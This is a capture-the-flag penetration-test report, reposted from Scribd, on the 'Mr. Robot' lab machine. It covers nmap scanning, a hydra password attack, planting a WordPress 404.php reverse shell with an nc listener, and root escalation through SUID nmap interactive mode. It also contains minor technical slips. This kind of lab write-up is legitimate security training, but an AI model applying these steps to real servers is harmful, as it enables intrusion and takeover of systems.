Thanks to visit codestin.com
Credit goes to www.scribd.com

Scribd
Upload
17 views9 pages

Penetration Test Report

The penetration test report for the Mr. Robot Machine identifies vulnerabilities in the target system, demonstrating that unauthorized access was achieved through poor administration practices and exploitation of WordPress vulnerabilities. The test involved gathering information, executing commands to gain initial access, and ultimately obtaining root privileges. The findings highlight the need for improved security measures to protect against such attacks.

Uploaded by

attacker1326
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
17 views9 pages

Penetration Test Report

The penetration test report for the Mr. Robot Machine identifies vulnerabilities in the target system, demonstrating that unauthorized access was achieved through poor administration practices and exploitation of WordPress vulnerabilities. The test involved gathering information, executing commands to gain initial access, and ultimately obtaining root privileges. The findings highlight the need for improved security measures to protect against such attacks.

Uploaded by

attacker1326
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 9

Penetration Test Report

(Mr. Robot Machine)


Cyber Security
Apoorav Verma
INDEX: -
1. Executive Summary
1.1 Scope of Work
1.2 Summary of Results
1.3 Assumptions
2. Attack Flow
2.1 Gathering Information
2.2 Vulnerability Check and Initial Access
2.3 Reverse Shell and Initial Server Connection
2.4 Root Access via Nmap Interactive Mode
3. Conclusion
1. Executive Summary
This report is the result of a penetration test with controlled environment. All activities were
conducted under the written permission and the ways that a hacker usually did. Through this
test gives the customer the following result of:
• Identifying if the target system is vulnerable
• Identifying if the target system is cracked through finding vulnerabilities

I conducted the penetration test based on the vulnerability of existing services, got
privileged access by using vulnerability of poor administration practice of nmap having
permission 400 which means that the command has root privilege while it is executing. We
could get root access by executing the command, nmap-interactive. Through this test,
vulnerabilities of software gave us the key to open the door, and insecure practices helped
us to get full access of the server.

1.1. Scope of Work


The test was designed to do following steps within a virtual environment.

 Scanning target network to find a victim (server)


 Getting detail information about the victim (server)
 Using vulnerability of the services
 Using hydra to gather id and password
 Accessing WordPress to modify 404.php.
 Getting access the victim by appending php-reverse-shell.php at the end of the file
404.php. Accessing the victim using nc command and connect
 Using find / -perm -4000 to check possible attack options
 Executing nmap -interactive to have a root privilege
 Getting root privilege through namp interactive mode

1.2. Summary of Results


The test used Word Press vulnerability to get ids and got passwords from hydra command.
After that, we could get login id and password, so we accessed the server to go further.
Through modifying 404.php, we could connect the target by using nc command. Finally, we
could get root privilege by executing nmap-interactive command.

1.3. Assumption
Firstly, the written permission to a penetration test is issued and approved. Secondly, the
target server is not on real service status and has a duplicate copy on a virtual environment.
Thirdly, the server has vulnerable services. Fourthly, the tester uses Kali Linux on the same
virtual network to test. Lastly, this report is only valid under this controlled test condition
only and if something is changed, the result may be different.
2. Attack Flow
2.1. Gathering information
Gathering information is the first step of our penetration test, so we use nmap command to scan the
target network 10.10.39.138. We can find the target system's IP address (10.10.39.138) and three
services ssh, http, and https. We could find the detail of the service by specifying argument"-p<start
port number>-<end port number>" or "-p<port number>." Similarly, all services at the server,
10.10.39.138, can be scanned with option "-SV-0 10.10.39.138-p1-65535" where 1 is the start port
number and 65535 is the last port number. For your information, we do not need to scan all ports as
we knew only three services were on the server
2.2. Vulnerability check and get initial access to the target server
First of all, from the detailed scan, we can find http service so we can use feroxbuster
(feroxbuster) http:// 10.10.39.138 to gather some information.. The following pictures show
the result of executing feroxbuster:

We check the web site from feroxbuster’s result and we could download fsocity.dic file from
the victim server to get some hints for getting a id and the password of the id and here also
we find the first of the three keys.
Similarly, we used hydra command for id and the password of the id and we could get the id,
elliot, and the password, ER28-0652. The following pictures show the result of getting a id
and the password
NOTE:- My machine broke while doing the hydra scan so I restarted the machine and so my
IP changed.

2.3. Initial access to connect the server with reverse shell


First of all, after getting the passwords, we could connect the target through Word Press
login page http:// 10.10.113.8/wp-login with the id, elliot, and the password ER28-0652
from hydra result. Next, we could access Word Press admin page and append reverse-shell
code after 404.php file. The following picture show the append result.
Finally, we could connect to the target server by using

# nc -lvnp 4321
2.4. Access root account
Finally, we could access to root privilege by using nmap-interactive command.
3. Conclusion
All activities were conducted under the written permission and the ways that a hacker
usually did. All activities are conducted to simulate an unauthorized access from outside.
Through this test, I give the customer the following result that:
The target system is vulnerable
• The target system is cracked through finding vulnerabilities

I conducted the penetration test based on the vulnerability of word press, and using some
executable files with having root privilege during their execution. The test result shows that
those poor practices led the hacker into the server.

You might also like